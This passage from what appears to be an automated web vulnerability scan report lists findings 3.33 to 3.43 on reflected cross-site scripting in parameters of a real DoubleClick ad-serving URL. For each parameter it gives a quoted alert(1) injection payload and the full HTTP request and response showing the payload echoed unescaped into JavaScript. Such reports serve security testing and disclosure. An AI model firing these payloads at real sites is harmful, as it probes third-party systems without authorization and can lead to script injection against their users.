Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5979
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:38 GMT
Expires: Mon, 14 Feb 2011 01:44:38 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56http://lp2.turbotax.com/ty10/bn/gdestp?cid=bn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_&priorityCode=4654700000\">
...[SNIP]...

3.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7261e"-alert(1)-"ebc0bfc526f was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6299
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:34 GMT
Expires: Mon, 14 Feb 2011 01:44:34 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f?cid=bn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250&priorityCode=4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

3.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f824'-alert(1)-'78ddba2521c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

3.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d629c"-alert(1)-"dabc82fe9a7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

3.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aaee'-alert(1)-'64021cf45b7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

3.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a69"-alert(1)-"441cf269a49 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlCli
...[SNIP]...

3.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca60b"-alert(1)-"9ecef699118 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

3.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcb10'-alert(1)-'29a07cd16fe was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

3.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f21e"-alert(1)-"c1a80b55da6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

3.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92ab7'-alert(1)-'6d6e3b013b3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

3.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3faad"-alert(1)-"dcba53557ab was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

3.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22cba'-alert(1)-'0a0ea759385 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
